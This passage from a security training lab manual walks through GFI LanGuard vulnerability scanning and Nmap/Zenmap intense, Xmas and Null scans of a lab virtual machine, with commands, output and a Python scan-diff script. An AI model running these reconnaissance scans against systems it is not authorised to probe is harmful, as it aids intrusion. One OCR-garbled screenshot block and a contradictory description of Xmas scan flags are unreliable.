GFI LANguard runs on Microsoft Windows Server 2008 Standard/Enterprise, Windows Server 2003 Standard/Enterprise, Windows 7 Ultimate, Microsoft Small Business Server 2008 Standard, Small Business Server 2003 (SP1), and Small Business Server 2000 (SP2).
GFI LANguard includes default configuration settings that allow you to run immediate scans soon after the installation is complete.
Lab Tasks
Follow the wizard-driven installation steps to install the GFI LANguard network
scanner on the Windows Server 2012 host machine.
1. Navigate to Windows Server 2012 and launch the Start menu by
hovering the mouse cursor in the lower-left corner of the desktop.
FIGURE 5.1: Windows Server 2012 - Desktop view
2. Click the GFI LanGuard 2012 app to open the GFI LanGuard 2012
window.
[Figure: Windows Server 2012 Start screen showing the installed apps, including GFI LanGuard 2012.]
FIGURE 5.2: Windows Server 2012 - Apps
3. The GFI LanGuard 2012 main window appears and displays the Network
Audit tab contents.
TASK 1: Scanning for Vulnerabilities
The Zenmap installer installs the following files: Nmap Core Files, Nmap Path, WinPcap 4.1.1, Network Interface Import, Zenmap (GUI frontend), Ncat (Modern Netcat), and Ndiff.
To execute a scan successfully, GFI LANguard must remotely log on to target computers with administrator privileges.
[Figure: GFI LanGuard 2012 main window. Tabs: Dashboard, Scan, Remediate, Activity Monitor, Reports, Configuration, Utilities. Welcome page options: View Dashboard (investigate network vulnerability status and audit results), Remediate Security Issues (deploy missing patches, uninstall unauthorized software, turn on antivirus and more), Manage Agents (enable agents to automate network security audits and distribute scanning load across client machines), Launch a Scan (manually set up and trigger an agentless network security audit). Local Computer Vulnerability Level: High.]
The default scanning options, which provide quick access to scanning modes, are:
■ Quick scan
■ Full scan
■ Launch a custom scan
■ Set up a scheduled scan
FIGURE 5.3: The GFI LANguard main window
4. Click the Launch a Scan option to perform a network scan.
[Figure: GFI LanGuard 2012 main window with the Launch a Scan option highlighted.]
FIGURE 5.4: The GFI LANguard main window indicating the Launch a Custom Scan option
5. The Launch a New Scan window will appear:
i. In the Scan Target option, select localhost from the drop-down list
ii. In the Profile option, select Full Scan from the drop-down list
iii. In the Credentials option, select currently logged on user from the
drop-down list
6. Click Scan.
Custom scans are recommended:
■ When performing a one-time scan with particular scanning parameters/profiles
■ When performing a scan for particular network threats and/or system information
■ To perform a target computer scan using a specific scan profile
If intrusion detection software (IDS) is running during scans, GFI LANguard sets off a multitude of IDS warnings and intrusion alerts in these applications.
[Figure: the Launch a New Scan pane with Scan Target set to localhost, Profile set to Full Scan, and Credentials set to currently logged on user.]
FIGURE 5.5: Selecting an option for network scanning
7. Scanning will start; it will take some time to scan the network. See the
following figure.
For large network environments, a Microsoft SQL Server/MSDE database backend is recommended instead of the Microsoft Access database.
Quick scans have relatively short scan durations compared to full scans, mainly because quick scans perform vulnerability checks of only a subset of the entire database. It is recommended to run a quick scan at least once a week.
8. After completing the scan, the scan result will show in the left panel.
[Figure: GFI LanGuard 2012 Scan Results Overview after the scan completes. Scan target: localhost, 10.0.0.7 [WIN-D39MR5HL9E4] (Windows Server 2012 x64). The summary reports the number of audit operations processed, the vulnerability level, and results statistics (audit operations processed, missing software updates, other vulnerabilities, potential vulnerabilities).]
FIGURE 5.7: The GFI LanGuard custom scan wizard
9. To check the Scan Results Overview, click the IP address of the machine in the
right panel.
10. It shows the Vulnerability Assessment and Network & Software Audit nodes;
click Vulnerability Assessment.
[Figure: GFI LanGuard 2012 Scan Results Details for 10.0.0.7 [WIN-D39MR5HL9E4] (Windows Server 2012 x64), with Vulnerability Assessment selected under the scan target. When a computer does not have a vulnerability level yet, the pane lists the possible reasons: the scan is not finished yet; detection of missing patches and vulnerabilities is disabled in the scanning profile used to perform the scan; the credentials used to scan this computer do not allow the security scanner to retrieve all the information required to estimate the vulnerability level (an account with administrative privileges on the target computer is required); or certain security settings on the remote computer block the access of the security scanner.]
FIGURE 5.8: Selecting the Vulnerability Assessment option
Types of scans:
Scan a single computer: Select this option to scan a local host or one specific computer.
Scan a range of computers: Select this option to scan a number of computers defined through an IP range.
Scan a list of computers: Select this option to import a list of targets from a file or to select targets from a network list.
Scan computers in text file: Select this option to scan targets enumerated in a specific text file.
Scan a domain or workgroup: Select this option to scan all targets connected to a domain or workgroup.
11. It shows all the Vulnerability Assessment indicators by category.
V GFI LanGuard 2012 -‫־‬Tbl‫־‬ x ‫־‬
L d > «‫־‬ Dashboard Sun R&neddte Activity Men!tot Reports Configuration JUbties W, D18CUB8•as v«a«on._
laaodi a Merc Scan
Bar Target; »roS»:
‫י‬ ‫׳‬ | j ... MScar- 3 $
c/fomess Jgynang: Password:
[curfrSr twftfonutier
V1 5o r
A
StanRevifttOeUNa
Vulnerability Assessment
5«tea ene of the 4U01Mrx)wjfcerabilry ‫יי‬3‫»*ל‬
*qn security Vumerabtmes (3)
X b u you to analyze the 1 ‫־‬0‫״‬ secuirty v jr e t b i: a
^ ■Jedium Security VulneraMKies (6)
ilo«.sycutoanaJy7e th s rr« lu n 1ec1rityvurerai>i5es
(14Low Security Vulnerabilities.
15iy » thelc« 9ecuIty‫׳‬yeu to a^
(1)Potential vulnerabilities.
o‫־־‬Xb>.s y«u to a-elvre tiie informationsecurity aJ
ttit-fung Stiivfca Packs and Updalo Rollups (1)
U>»3ycutoane(yK thcrmeiroiervmpKtsnVmevn
Scan lUnutti Overvttm
^ $ u a U r« « t:lQ u lm l
f S I S ItM J ( m R - K M M U H U M ](W M to m .
- • «uhefeblty Astastrocnt
A ‫*־י‬ * securitywirerablofa(3)
Jl MeCtomScanty Vuherabirtes (6)
j , low Searity Viinerablitfes(4J
4 PofanBd Vuherabltea (3)
t Meshc servicePacksand Usdate=&u>s (1}
# Msarvs Security Lfxlates (3)
- _* Hec*alt&S0ftAareA1rft
thread I (Idle) |Scan Pvead 7 (d t' I 5 u n t1 « : 3 Otfic] Bras
During a full scan, GFI LANguard scans target computers to retrieve setup information and identify all security vulnerabilities including:
■ Missing Microsoft updates
■ System software information, including unauthorized applications, incorrect antivirus settings and outdated signatures
■ System hardware information, including connected modems and USB devices
FIGURE 5.9: List of Vulnerability Assessment categories
12. Click Network & Software Audit in the right panel, and then click System Patching Status, which shows all the system patching statuses.
FIGURE 5.10: System patching status report
13. Click Ports, and under this, click Open TCP Ports.
Due to the large amount of information retrieved from scanned targets, full scans often tend to be lengthy. It is recommended to run a full scan at least once every 2 weeks.
FIGURE 5.11: TCP/UDP Ports result
14. Click System Information in the right side panel; it shows all the details of the system information.
A custom scan is a network audit based on parameters, which you configure on the fly before launching the scanning process.
Various parameters can be customized during this type of scan, including:
■ Type of scanning profile (i.e., the type of checks to execute/type of data to retrieve)
■ Scan targets
■ Logon credentials
15. Click Password Policy
FIGURE 5.12: Information of Password Policy
16. Click Groups; it shows all the groups present in the system.
The next job after a network security scan is to identify which areas and systems require your immediate attention. Do this by analyzing and correctly interpreting the information collected and generated during a network security scan.
FIGURE 5.13: Information of Groups
17. Click the Dashboard tab; it shows all the scanned network information.
FIGURE 5.14: Scanned report of the network
Lab Analysis
Document all the results, threats, and vulnerabilities discovered during the scanning and auditing process.
A high vulnerability level is the result of vulnerabilities or missing patches whose average severity is categorized as high.
A scheduled scan is a network audit scheduled to run automatically on a specific date/time and at a specific frequency. Scheduled scans can be set to execute once or periodically.
It is recommended to use scheduled scans:
■ To perform periodical/regular network vulnerability scans automatically and using the same scanning profiles and parameters
■ To trigger scans automatically after office hours and to generate alerts and auto-distribution of scan results via email
■ To automatically trigger auto-remediation options (e.g., auto download and deploy missing updates)
Tool/Utility: GFI LanGuard 2012
Information Collected/Objectives Achieved:
■ Vulnerability Level
■ Vulnerability Assessment
■ System Patching Status
■ Scan Results Details for Open TCP Ports
■ Scan Results Details for Password Policy
■ Dashboard - Entire Network:
  ■ Vulnerability Level
  ■ Security Sensors
  ■ Most Vulnerable Computers
  ■ Agent Status
  ■ Vulnerability Trend Over Time
  ■ Computer Vulnerability Distribution
  ■ Computers by Operating System
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Analyze how GFI LANguard products provide protection against a worm.
2. Evaluate under what circumstances GFI LANguard displays a dialog during patch deployment.
3. Can you change the message displayed when GFI LANguard is performing administrative tasks? If yes, how?
Internet Connection Required
☐ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs
Exploring and Auditing a Network
Using Nmap
Nmap (Zenmap is the official Nmap GUI) is a free, open source (license) utility for network exploration and security auditing.
Lab Scenario
In the previous lab you learned to use GFI LanGuard 2012 to scan a network to find out the vulnerability level, system patching status, details for open and closed ports, vulnerable computers, etc. An administrator and an attacker can use the same tools to fix or exploit a system. If an attacker gets to know all the information about vulnerable computers, they will immediately act to compromise those systems using reconnaissance techniques.
Therefore, as an administrator it is very important for you to patch those systems after you have determined all the vulnerabilities in a network, before the attacker audits the network to gain vulnerable information.
Also, as an ethical hacker and network administrator for your company, your job is to carry out daily security tasks, such as network inventory, service upgrade schedules, and the monitoring of host or service uptime. So, you will be guided in this lab to use Nmap to explore and audit a network.
Lab Objectives
The objective of this lab is to help students learn and understand how to perform a network inventory, manage services and upgrades, schedule network tasks, and monitor host or service uptime and downtime.
In this lab, you need to:
■ Scan TCP and UDP ports
■ Analyze host details and their topology
■ Determine the types of packet filters
■ Record and save all scan reports
■ Compare saved results for suspicious ports
Lab Environment
To perform the lab, you need:
■ Nmap located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\Nmap
■ You can also download the latest version of Nmap from the link http://nmap.org/
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012 as a host machine
■ Windows Server 2008 running on a virtual machine as a guest
■ A web browser with Internet access
■ Administrative privileges to run the Nmap tool
Lab Duration
Time: 20 Minutes
Overview of Network Scanning
Network addresses are scanned to determine:
■ What services (application names and versions) those hosts offer
■ What operating systems (and OS versions) they run
■ The type of packet filters/firewalls that are in use, and dozens of other characteristics
Zenmap works on Windows, including Windows 7 and Server 2003/2008.
Lab Tasks
Follow the wizard-driven installation steps and install the Nmap (Zenmap) scanner on the host machine (Windows Server 2012).
TASK 1
Intense Scan
1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.
FIGURE 6.1: Windows Server 2012 - Desktop view
2. Click the Nmap-Zenmap GUI app to open the Zenmap window
The Zenmap file installs the following files:
■ Nmap Core Files
■ Nmap Path
■ WinPcap 4.1.1
■ Network Interface Import
■ Zenmap (GUI frontend)
■ Ncat (Modern Netcat)
■ Ndiff
FIGURE 6.2: Windows Server 2012 - Apps
3. The Nmap - Zenmap GUI window appears.
Nmap Syntax: nmap [Scan Type(s)] [Options] {target specification}
FIGURE 6.3: The Zenmap main window
In port scan techniques, only one method may be used at a time, except that UDP scan (-sU) and any one of the SCTP scan types (-sY, -sZ) may be combined with any one of the TCP scan types.
4. Enter the virtual machine Windows Server 2008 IP address (10.0.0.4) in the Target: text field. You are performing a network inventory for the virtual machine.
5. In this lab, the IP address would be 10.0.0.4; it will be different in your lab environment.
6. In the Profile: text field, select, from the drop-down list, the type of profile you want to scan. In this lab, select Intense Scan.
7. Click Scan to start scanning the virtual machine.
[Screenshot: Zenmap main window; Target: 10.0.0.4, Profile: Intense scan, Command: nmap -T4 -A -v 10.0.0.4]
FIGURE 6.4: The Zenmap main window with Target and Profile entered
8. Nmap scans the provided IP address with Intense scan and displays the scan result below the Nmap Output tab.
[Screenshot: Nmap Output tab for the command nmap -T4 -A -v 10.0.0.4]
Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24
NSE: Loaded 93 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 15:35
Scanning 10.0.0.4 [1 port]
Completed ARP Ping Scan at 15:35, 0.17s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:35
Completed Parallel DNS resolution of 1 host. at 15:35, 0.50s elapsed
Initiating SYN Stealth Scan at 15:35
Scanning 10.0.0.4 [1000 ports]
Discovered open port 135/tcp on 10.0.0.4
Discovered open port 139/tcp on 10.0.0.4
Discovered open port 445/tcp on 10.0.0.4
Increasing send delay for 10.0.0.4 from 0 to 5 due to 72 out of 179 dropped probes since last increase.
Discovered open port 49152/tcp on 10.0.0.4
Discovered open port 49154/tcp on 10.0.0.4
Discovered open port 49153/tcp on 10.0.0.4
Discovered open port 49156/tcp on 10.0.0.4
Discovered open port 49155/tcp on 10.0.0.4
Discovered open port 5357/tcp on 10.0.0.4
FIGURE 6.5: The Zenmap main window with the Nmap Output tab for Intense Scan
9. After the scan is complete, Nmap shows the scanned results.
While Nmap attempts to produce accurate results, keep in mind that all of its insights are based on packets returned by the target machines or the firewalls in front of them.
The six port states recognized by Nmap:
■ Open
■ Closed
■ Filtered
■ Unfiltered
■ Open|Filtered
■ Closed|Unfiltered
Nmap accepts multiple host specifications on the command line, and they don't need to be of the same type.
[Screenshot: Nmap Output tab (scrolled down) for the command nmap -T4 -A -v 10.0.0.4]
139/tcp   open  netbios-ssn
445/tcp   open  netbios-ssn
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-methods: No Allow or Public header in OPTIONS response (status code 503)
|_http-title: Service Unavailable
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 00:15:5D:00:07:10 (Microsoft)
Device type: general purpose
Running: Microsoft Windows 7|2008
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008::sp1
OS details: Microsoft Windows 7 or Windows Server 2008 SP1
Uptime guess: 0.256 days (since Fri Aug 24 09:27:40 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
FIGURE 6.6: The Zenmap main window with the Nmap Output tab for Intense Scan
10. Click the Ports/Hosts tab to display more information on the scan results.
11. Nmap also displays the Port, Protocol, State, Service, and Version of the scan.
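The lab objectives include saving scan reports and comparing saved results for suspicious ports. As an added example that is not part of the lab manual or of Nmap itself, the following Python parses the kind of Nmap output shown above (port-table rows, the verbose "Discovered open port" lines, the MAC and OS details lines) and diffs two saved scans so that newly opened ports stand out; the sample scan texts are constructed to mirror the lab's 10.0.0.4 result, and the extra 3389/tcp listener in the second sample is invented for the demonstration.

```python
"""Parse Nmap normal output and diff two saved scans for suspicious ports.

Added example, not code from the CEH lab manual or from the Nmap project.
The sample scan text below is constructed to mirror the intense-scan output
shown in the lab (host 10.0.0.4, Windows 7 / Server 2008 SP1 fingerprint);
the second sample adds one constructed extra port to show the diff.
"""
import re
from dataclasses import dataclass

# Port-table rows: "5357/tcp  open  http  Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp|sctp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)
# Verbose progress lines: "Discovered open port 135/tcp on 10.0.0.4"
DISCOVERED = re.compile(
    r"^Discovered (?P<state>open|open\|filtered) port (?P<port>\d+)/(?P<proto>\w+) on \S+$"
)
OS_DETAILS = re.compile(r"^OS details: (?P<os>.+)$")
MAC_LINE = re.compile(r"^MAC Address: (?P<mac>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})")


@dataclass(frozen=True)
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_nmap_output(text):
    """Return a dict with the port table, OS guess, MAC and the 'Discovered' set."""
    parsed = {"ports": {}, "os": None, "mac": None, "discovered": set()}
    for raw in text.splitlines():
        line = raw.strip()
        if m := PORT_LINE.match(line):
            rec = PortRecord(int(m["port"]), m["proto"], m["state"], m["service"],
                             (m["version"] or "").strip())
            parsed["ports"][(rec.port, rec.proto)] = rec
        elif m := DISCOVERED.match(line):
            parsed["discovered"].add((int(m["port"]), m["proto"]))
        elif m := OS_DETAILS.match(line):
            parsed["os"] = m["os"]
        elif m := MAC_LINE.match(line):
            parsed["mac"] = m["mac"].upper()
    return parsed


def open_ports(parsed):
    return {key for key, rec in parsed["ports"].items() if rec.state == "open"}


def table_matches_progress(parsed):
    """Sanity check: every 'Discovered open port' line should appear as open in the table."""
    return parsed["discovered"] <= open_ports(parsed)


def diff_scans(baseline, current):
    """Newly opened ports between two saved scans are the ones to investigate first."""
    before, after = open_ports(baseline), open_ports(current)
    return {
        "newly_open": sorted(after - before),
        "newly_closed": sorted(before - after),
        "unchanged": sorted(before & after),
    }


# Constructed sample, modelled on the lab's intense-scan output for 10.0.0.4.
BASELINE_SCAN = """\
Discovered open port 135/tcp on 10.0.0.4
Discovered open port 139/tcp on 10.0.0.4
Discovered open port 445/tcp on 10.0.0.4
Discovered open port 5357/tcp on 10.0.0.4
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn
445/tcp   open  netbios-ssn
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
49152/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 00:15:5D:00:07:10 (Microsoft)
OS details: Microsoft Windows 7 or Windows Server 2008 SP1
"""

# Constructed follow-up scan: same host, one extra listener (3389/tcp) has appeared.
LATER_SCAN = BASELINE_SCAN.replace(
    "49152/tcp open  msrpc        Microsoft Windows RPC",
    "3389/tcp  open  ms-wbt-server Microsoft Terminal Service\n"
    "49152/tcp open  msrpc        Microsoft Windows RPC",
)

if __name__ == "__main__":
    base, later = parse_nmap_output(BASELINE_SCAN), parse_nmap_output(LATER_SCAN)
    print("baseline consistent:", table_matches_progress(base))
    print("OS:", base["os"], "MAC:", base["mac"])
    print("diff:", diff_scans(base, later))
```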
[Screenshot: Ports/Hosts tab for 10.0.0.4]
Port   Protocol  State  Service      Version
135    tcp       open   msrpc        Microsoft Windows RPC
139    tcp       open   netbios-ssn
445    tcp       open   netbios-ssn
5357   tcp       open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152  tcp       open   msrpc        Microsoft Windows RPC
49153  tcp       open   msrpc        Microsoft Windows RPC
49154  tcp       open   msrpc        Microsoft Windows RPC
49155  tcp       open   msrpc        Microsoft Windows RPC
49156  tcp       open   msrpc        Microsoft Windows RPC
The options available to control target selection:
■ -iL <inputfilename>
■ -iR <num hosts>
■ --exclude <host1>[,<host2>[,...]]
■ --excludefile <exclude_file>
The following options control host discovery:
■ -sL (List Scan)
■ -sn (No port scan)
■ -Pn (No ping)
■ -PS <port list> (TCP SYN Ping)
■ -PA <port list> (TCP ACK Ping)
■ -PU <port list> (UDP Ping)
■ -PY <port list> (SCTP INIT Ping)
■ -PE; -PP; -PM (ICMP Ping Types)
■ -PO <protocol list> (IP Protocol Ping)
■ -PR (ARP Ping)
■ --traceroute (Trace path to host)
■ -n (No DNS resolution)
■ -R (DNS resolution for all targets)
■ --system-dns (Use system DNS resolver)
■ --dns-servers <server1>[,<server2>[,...]] (Servers to use for reverse DNS queries)
FIGURE 6.7: The Zenmap main window with the Ports/Hosts tab for Intense Scan
12. Click the Topology tab to view Nmap’s topology for the provided IP
address in the Intense scan Profile.
FIGURE 6.8: The Zenmap main window with Topology tab for Intense Scan
13. Click the Host Details tab to see the details of all hosts discovered during the intense scan profile.
[Screenshot: Host Details tab for 10.0.0.4]
Host Status: State: up; Open ports: 9; Filtered ports: 0; Closed ports: 991; Scanned ports: 1000; Uptime: 22151; Last boot: Fri Aug 24 09:27:40 2012
Addresses: IPv4: 10.0.0.4; IPv6: Not available; MAC: 00:15:5D:00:07:10
Operating System: Name: Microsoft Windows 7 or Windows Server 2008 SP1
FIGURE 6.9: The Zenmap main window with Host Details tab for Intense Scan
By default, Nmap performs a host discovery and then a port scan against each host it determines to be online.
By default, Nmap determines your DNS servers (for rDNS resolution) from your resolv.conf file (UNIX) or the Registry (Win32).
14. Click the Scans tab to see the scan details for the provided IP address.
[Screenshot: Scans tab; Status: Unsaved, Command: nmap -T4 -A -v 10.0.0.4; buttons: Append Scan, Remove Scan, Cancel Scan]
FIGURE 6.10: The Zenmap main window with Scans tab for Intense Scan
15. Now, click the Services tab located in the right pane of the window. This tab displays the list of services.
16. Click the http service to list all the HTTP hostnames/IP addresses, ports, and their states (Open/Closed).
[Screenshot: Services tab listing http, msrpc and netbios-ssn; with http selected the row reads: Hostname 10.0.0.4, Port 5357, Protocol tcp, State open, Version Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)]
Nmap offers options for specifying which ports are scanned and whether the scan order is randomized or sequential.
In Nmap, option -p <port ranges> means scan only specified ports.
In Nmap, option -F means fast (limited port) scan.
FIGURE 6.11: The Zenmap main window with Services option for Intense Scan
17. Click the msrpc service to list all the Microsoft Windows RPC services.
[Screenshot: Services tab with msrpc selected; rows for hostname 10.0.0.4, ports 135, 49152, 49153, 49154, 49155 and 49156, Protocol tcp, State open, Version Microsoft Windows RPC]
In Nmap, option --port-ratio <ratio><decimal number between 0 and 1> means scan all ports in the nmap-services file with a ratio greater than the one given. <ratio> must be between 0.0 and 1.1.
FIGURE 6.12: The Zenmap main window with msrpc Service for Intense Scan
18. Click the netbios-ssn service to list all NetBIOS hostnames.
[Screenshot: Services tab with netbios-ssn selected; rows for hostname 10.0.0.4, ports 139 and 445, Protocol tcp, State open]
FIGURE 6.13: The Zenmap main window with netbios-ssn Service for Intense Scan
TASK 2
Xmas Scan
In Nmap, option -r means don't randomize ports.
19. Xmas scan sends a TCP frame to a remote device with URG, ACK, RST, SYN, and FIN flags set. FIN scans work only with OS TCP/IP implementations developed according to RFC 793. The current version of Microsoft Windows is not supported.
20. Now, to perform a Xmas Scan, you need to create a new profile. Click Profile -> New Profile or Command (Ctrl+P).
Xmas scan (-sX) sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.
The option --max-retries <numtries> specifies the maximum number of port scan probe retransmissions.
21. On the Profile tab, enter Xmas Scan in the Profile name text field.
[Screenshot: Profile Editor, Profile tab; tabs: Profile, Scan, Ping, Scripting, Target, Source, Other, Timing; Profile name: Xmas Scan; Description field hint: "The description is a full description of what the scan does, which may be long."; command shown: nmap -T4 -A -v 10.0.0.4; buttons: Cancel, Save Changes]
The option --host-timeout <time> gives up on slow target hosts.
FIGURE 6.15: The Zenmap Profile Editor window with the Profile tab
22. Click the Scan tab, and select Xmas Tree scan (-sX) from the TCP scans: drop-down list.
[Screenshot: Profile Editor, Scan tab; Targets (optional): 10.0.0.4; TCP scans drop-down: None, ACK scan (-sA), FIN scan (-sF), Maimon scan (-sM), Null scan (-sN), TCP SYN scan (-sS), TCP connect scan (-sT), Window scan (-sW), Xmas Tree scan (-sX); further options: Non-TCP scans, Timing template, Enable all advanced/aggressive options (-A) (enables OS detection (-O), version detection (-sV), script scanning (-sC) and traceroute (--traceroute)), Operating system detection (-O), Version detection (-sV), Idle Scan (Zombie) (-sI), FTP bounce attack (-b), Disable reverse DNS resolution (-n), IPv6 support (-6); buttons: Cancel, Save Changes]
FIGURE 6.16: The Zenmap Profile Editor window with the Scan tab
23. Select None in the Non-TCP scans: drop-down list and Aggressive (-T4) in the Timing template: list, and click Save Changes.
[Screenshot: Profile Editor, Scan tab; Targets (optional): 10.0.0.4; TCP scan: Xmas Tree scan (-sX); Non-TCP scans: None; Timing template: Aggressive (-T4); Enable all advanced/aggressive options (-A) checked; resulting command: nmap -sX -T4 -A -v 10.0.0.4]
FIGURE 6.17: The Zenmap Profile Editor window with the Scan tab
24. Enter the IP address in the Target: field, select the Xmas Scan option from the Profile: field, and click Scan.
UDP scan is activated with the -sU option. It can be combined with a TCP scan type such as SYN scan (-sS) to check both protocols during the same run.
Nmap detects rate limiting and slows down accordingly to avoid flooding the network with useless packets that the target machine drops.
You can speed up your UDP scans by scanning more hosts in parallel, doing a quick scan of just the popular ports first, scanning from behind the firewall, and using --host-timeout to skip slow hosts.
[Screenshot: Zenmap main window; Target: 10.0.0.4, Profile: Xmas Scan, Command: nmap -sX -T4 -A -v 10.0.0.4]
In Nmap, option -sY (SCTP INIT scan) is often referred to as half-open scanning, because you don't open a full SCTP association. You send an INIT chunk, as if you were going to open a real association, and then wait for a response.
FIGURE 6.18: The Zenmap main window with Target and Profile entered
25. Nmap scans the target IP address provided and displays results on the
Nmap Output tab.
[Screenshot: Nmap Output tab for the command nmap -sX -T4 -A -v 10.0.0.4]
Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24
NSE: Loaded 93 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 16:29
Scanning 10.0.0.4 [1 port]
Completed ARP Ping Scan at 16:29, 0.15s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:29
Completed Parallel DNS resolution of 1 host. at 16:29, 0.00s elapsed
Initiating XMAS Scan at 16:29
Scanning 10.0.0.4 [1000 ports]
Increasing send delay for 10.0.0.4 from 0 to 5 due to 34 out of 84 dropped probes since last increase.
Completed XMAS Scan at 16:30, 8.36s elapsed (1000 total ports)
Initiating Service scan at 16:30
Initiating OS detection (try #1) against 10.0.0.4
NSE: Script scanning 10.0.0.4.
Initiating NSE at 16:30
Completed NSE at 16:30, 0.00s elapsed
Nmap scan report for 10.0.0.4
Host is up (0.00020s latency).
When scanning systems compliant with this RFC text, any packet not containing SYN, RST, or ACK bits results in a returned RST if the port is closed, and no response at all if the port is open.
The option -sA (TCP ACK scan) is used to map out firewall rulesets, determining whether they are stateful or not and which ports are filtered.
FIGURE 6.19: The Zenmap main window with the Nmap Output tab
26. Click the Services tab located at the right side of the pane. It displays all the services of that host.
[The same Zenmap window (Target: 10.0.0.4, Profile: Xmas Scan, Command: nmap -sX -T4 -A -v 10.0.0.4, Nmap Output as in Figure 6.19) with the Services tab selected on the right.]
FIGURE 6.20: The Zenmap main window with the Services tab
27. Null scan works only if the operating system's TCP/IP implementation is developed according to RFC 793. In a null scan, attackers send a TCP frame to a remote host with NO flags.
28. To perform a null scan for a target IP address, create a new profile. Click Profile -> New Profile or Command Ctrl+P.
[Zenmap main window with the Profile menu open: New Profile or Command (Ctrl+P), Edit Selected Profile (Ctrl+E).]
FIGURE 6.21: The Zenmap main window with the New Profile or Command option
TASK 3: Null Scan
The Null Scan option (-sN) does not set any bits (the TCP flag header is 0).
The option -sZ (SCTP COOKIE ECHO scan) is an advanced SCTP COOKIE ECHO scan. It takes advantage of the fact that SCTP implementations should silently drop packets containing COOKIE ECHO chunks on open ports but send an ABORT if the port is closed.
29. On the Profile tab, input a profile name Null Scan in the Profile name text field.
The option -sI <zombie host>[:<probeport>] (idle scan) is an advanced scan method that allows for a truly blind TCP port scan of the target (meaning no packets are sent to the target from your real IP address). Instead, a unique side-channel attack exploits predictable IP fragmentation ID sequence generation on the zombie host to glean information about the open ports on the target.
FIGURE 6.22: The Zenmap Profile Editor with the Profile tab
30. Click the Scan tab in the Profile Editor window. Now select the Null Scan (-sN) option from the TCP scan: drop-down list.
[Profile Editor, Scan tab. The TCP scan: drop-down lists ACK scan (-sA), FIN scan (-sF), Maimon scan (-sM), Null scan (-sN), TCP SYN scan (-sS), TCP connect scan (-sT), Window scan (-sW) and Xmas Tree scan (-sX). The other options on the tab are Targets (optional), Non-TCP scans, Timing template, Enable all advanced/aggressive options, Operating system detection (-O), Version detection (-sV), Idle Scan (Zombie) (-sI), FTP bounce attack (-b), Disable reverse DNS resolution (-n) and IPv6 support (-6).]
FIGURE 6.23: The Zenmap Profile Editor with the Scan tab
31. Select None from the Non-TCP scans: drop-down field and select
Aggressive (-T4) from the Timing template: drop-down field.
32. Click Save Changes to save the newly created profile.
The option -b <FTP relay host> (FTP bounce scan) allows a user to connect to one FTP server, and then ask that files be sent to a third-party server. Such a feature is ripe for abuse on many levels, so most servers have ceased supporting it.
The option -r (Don't randomize ports): By default, Nmap randomizes the scanned port order (except that certain commonly accessible ports are moved near the beginning for efficiency reasons). This randomization is normally desirable, but you can specify -r for sequential (sorted from lowest to highest) port scanning instead.
[Profile Editor, Scan tab, after the selections: Targets (optional): 10.0.0.4; TCP scan: Null scan (-sN); Non-TCP scans: None; Timing template: Aggressive (-T4). Help text for Disable reverse DNS resolution: "Never do reverse DNS. This can slash scanning times."]
FIGURE 6.24: The Zenmap Profile Editor with the Scan tab
33. In the main window of Zenmap, enter the target IP address to scan, select the Null Scan profile from the Profile drop-down list, and then click Scan.
In Nmap, the option --version-all (Try every single probe) is an alias for --version-intensity 9, ensuring that every single probe is attempted against each port.
The option --top-ports <n> scans the <n> highest-ratio ports found in the nmap-services file. <n> must be 1 or greater.
[Zenmap main window with Target: 10.0.0.4 and Profile: Null Scan entered; the Ports / Hosts tab shows the columns Port, Protocol, State, Service and Version.]
The option -sR (RPC scan) works in conjunction with the various port scan methods of Nmap. It takes all the TCP/UDP ports found open and floods them with SunRPC program NULL commands in an attempt to determine whether they are RPC ports, and if so, what program and version number they serve up.
FIGURE 6.25: The Zenmap main window with Target and Profile entered
34. Nmap scans the target IP address provided and displays the results in the Nmap Output tab.
Nmap Output tab (Target: 10.0.0.4, Profile: Null Scan, Command: nmap -sN -T4 -A -v 10.0.0.4):
Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24
NSE: Loaded 93 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 16:47
Scanning 10.0.0.4 [1 port]
Completed ARP Ping Scan at 16:47, 0.14s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:47
Completed Parallel DNS resolution of 1 host. at 16:47, 0.28s elapsed
Initiating NULL Scan at 16:47
Scanning 10.0.0.4 [1000 ports]
